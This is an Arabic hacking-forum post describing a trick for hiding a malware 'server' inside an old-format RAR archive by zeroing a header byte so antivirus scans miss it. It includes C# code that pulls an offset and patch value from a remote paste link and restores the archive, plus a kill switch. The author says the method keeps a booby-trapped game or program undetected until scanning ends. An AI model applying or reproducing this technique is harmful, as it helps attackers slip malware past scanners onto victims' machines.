16.10.2017 Rar Trick to hide your Server and more


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,533
2,887
1
حياكم الله ياشباب
نزلت موضوع من سنين هنا بالمنتدى
انه عندما تضغط ملفين سويا بالوين رار الاصدار القديم وتفتح الرار بالهكس وتروح للملف اللي تريد تخفيه
وبتصفر ال t بيتختفي الملف
الفحص قبل تصفير الt
VirusTotal
بعد التصفير
VirusTotal
القصة مش قصة تشفير
القصة فقط كيفية اخفاء سيرفرك لفترة انت تريدها وتحددها من ثم ترجع الاوفستات الصحيحة وتفك الرار وتشتغل بالناتج مثل ماتريد
هنا السورس
C#:
if ( Microsoft().Result == "bashar" )
            {
                Application.Exit();
            }
            else
            {
                BinaryWriter bw = new BinaryWriter(File.OpenWrite(Directory.GetCurrentDirectory() + @"\test.rar"));
                var i = Convert.ToInt32(Microsoft().Result, 16);
                bw.BaseStream.Position = i;
                bw.Write(Convert.ToInt32(MicrosoftT().Result, 16));
                bw.Close();
 
            }
حيث ان Microsoft().Result هي فانكشن لجلب سترينج من اي رابط مباشر او باست بين او الخ
ان كنت مسجل بالملف اسم bashar رح يتم الخروج من البرنامج
يعني بتستخدمها لبين مايتم الانتهاء من فحص ملفات اللعبه اللي ملغمها او البرنامج
وان قمت بتغيير المحتوى للملف النصي بالفانكشن Microsoft
لاوفستات المتواجدة فيها t وهيه عندي
C#:
0x0000F85D
رح يتم الاخلال بالشرط وينتقل ل else
اللي موجود فيها باينري رايتير لكتابة الاوفستات
C#:
var i = Convert.ToInt32(Microsoft().Result, 16);
يتم تحديد اولا موقع الاوفستات المراد التعديل عليها كما قلت
يتم جلب السترينج من الفانكشن الاولى Microsoft وتحويله لانتجر
ومن ثم نقوم بتزويده بالاوفستات المراد تعديلها
C#:
bw.Write(Convert.ToInt32(MicrosoftT().Result, 16));
وهي
C#:
0x32904074
74
منجيب السترينج من الفانكشن MicrosoftT
وهي تحتوي كما قلت على مانريد كتابته في الاوفستات المحددة
ومن ثم هنا عملك انت بتروح بتتعلم كيف تفك الرار عن طريق السي شارب وبتستخدم الناتج مثل ماتريد
الجيد بالطريقة لمن راى السورس وفهمه
انه لايعرف ابدا الاوفستات الهدف ولاحتى ماسيتم تعديله ..ماسيتم اضافته
الا اللهم اللي شاف الشرح هنا او اللي بيعرف بثغرة الرار القديمة ان صحت تسميها ثغرة
لمشاهدة الشرح من المرفقات
وبالاخير طرحت الموضوع لانه مش مطروح بمكان
وكنت متطرق له من سنين كثيرة والان استغليته برمجيا من خلال موضوعنا هنا
[Hex + Programming]->تغيير اوفستات الملف<Clean>


 

المرفقات

  • 31.7 MB المشاهدات: 5

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك